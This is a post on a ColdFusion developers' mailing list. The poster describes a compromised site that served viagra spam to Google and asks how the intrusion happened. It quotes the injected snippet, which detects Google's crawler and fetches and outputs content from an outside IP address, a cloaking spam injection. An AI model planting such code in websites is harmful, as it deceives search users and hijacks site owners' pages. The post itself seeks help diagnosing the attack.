Recently a site of ours got hacked - basically, a Google search the site was returning viagra info! What we got was a small script added to the end of a functions.cfm file:
<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find( "google", REQUEST.UserAgent )) > <cfhttp method="get" url="http://168.16.228.250/fms/";><cfoutput>#cfhttp.filecontent#</cfoutput></cfif> I'm not the server admin for this site, so they're sorta pointing the finger at us developers, and we're pointing fingers back at them about lax server security. We've got a boatload of stuff on this site to prevernt SQL injection, including Justin D. Scott's application script, carefully checking anything to goes into the database, client and server side form validation, blah, blah, blah... Anybody seen the above, and if so, thoughts? Anybody manage to determine how the exploit happened to start with? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353143 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
